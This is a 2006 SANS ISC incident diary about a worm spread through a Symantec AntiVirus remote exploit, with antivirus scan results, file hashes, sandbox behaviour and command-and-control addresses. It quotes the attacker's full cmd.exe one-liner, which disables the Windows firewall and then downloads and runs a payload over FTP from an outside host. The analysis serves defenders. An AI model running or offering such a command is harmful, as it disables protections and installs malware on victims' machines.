Threat Level: green Handler on Duty: Brad Duncan

SANS ISC InfoSec Handlers Diary Blog


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

sav worm and its cc

Published: 2006-12-15
Last Updated: 2006-12-15 19:13:42 UTC
by donald smith (Version: 2)
0 comment(s)
Thanks to John for this submission:

This file was being downloaded by a large number of machines that were recently exploited using the SAV remote exploit. The sequence of events for these compromises were:

Exploit comes in from IP address A (this IP varies)
Victim sends a Windows command prompt to 61.172.250.59 on tcp port 12345 61.172.250.59 responds with the following:
cmd.exe /c "Net Stop SharedAccess&cd %TEMP%&echo open ftpd.3322.org 21211>x&echo test>>x&echo test>>x&echo bin>>x&echo get NL.eXe>>x&echo bye>>x&ftp.eXe -s:x&NL.eXe&del x"

Obviously, this command stops the Windows firewall service,
creates an ftp command script named "x" that is then run by ftp.exe -s:x
which downloads NL.eXe (from ftpd.3322.org 21211),
the file is then executed and then the x file is deleted.


Running the file through Virustotal gave limited information.

Complete scanning result of "NL.eXe", received in VirusTotal at 12.14.2006, 18:15:47 (CET). 
BitDefender 7.2 12.14.2006 DeepScan:Generic.Malware.IBdld!g.C9552284
CAT-QuickHeal 8.00 12.14.2006 (Suspicious) - DNAScan
eSafe 7.0.14.0 12.14.2006 Win32.Polipos.sus
 Fortinet 2.82.0.0 12.14.2006 suspicious
Ikarus T3.1.0.26 12.14.2006 Trojan-Downloader.Win32.Zlob.and
Kaspersky 4.0.2.24 12.14.2006 no virus found
Norman 5.80.02 12.14.2006 W32/Suspicious_U.gen
Panda 9.0.0.4 12.13.2006 Suspicious file
Prevx1 V2 12.14.2006 Malicious
Sophos 4.12.0 12.14.2006 Mal/Behav-009
Sunbelt 2.2.907.0 11.30.2006 VIPRE.Suspicious
 All others reported no virus found!

Aditional Information
File size: 12168 bytes
MD5: f538d2c73c7bc7ad084deb8429bd41ef
SHA1: 0eb52548a1c234cb2f8506a7c9a2e1a4547e9f8d
packers: UPACK
packers: embedded, UPack
Prevx info: http://fileinfo.prevx.com/fileinfo.asp?PXC=70e962776070
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.

John, then reviewed his ids logs looking for traffic on the port 5202 which appears to be the command and control port for this malware and discovered traffic towards 61.172.146.94.

We have requested the cc system and the malware distribution site be shutdown.

I submitted nl.exe to norman and here are the results:
nl.exe.virus : Not detected by Sandbox (Signature: W32/Suspicious_U.gen)

 [ General information ]
    * File length:        12168 bytes.
    * MD5 hash: f538d2c73c7bc7ad084deb8429bd41ef.

 [ Changes to filesystem ]
    * Creates file C:\WINDOWS\SYSTEM32\wuauclt.dll.
    * Creates file C:\WINDOWS\TEMP\NL055.bat.

 [ Process/window information ]
    * Enumerates running processes.
    * Attemps to NULL C:\WINDOWS\TEMP\NL055.bat NULL.

 [ Signature Scanning ]
    * C:\WINDOWS\SYSTEM32\wuauclt.dll (23040 bytes) : no signature detection.
    * C:\WINDOWS\TEMP\NL055.bat (102 bytes) : no signature detection.

(C) 2004-2006 Norman ASA. All Rights Reserved

We had one report that this virus included a keylogger that has yet to be verified.



 
Keywords:
0 comment(s)
Meet donald smith at SANSFIRE!
Diary Archives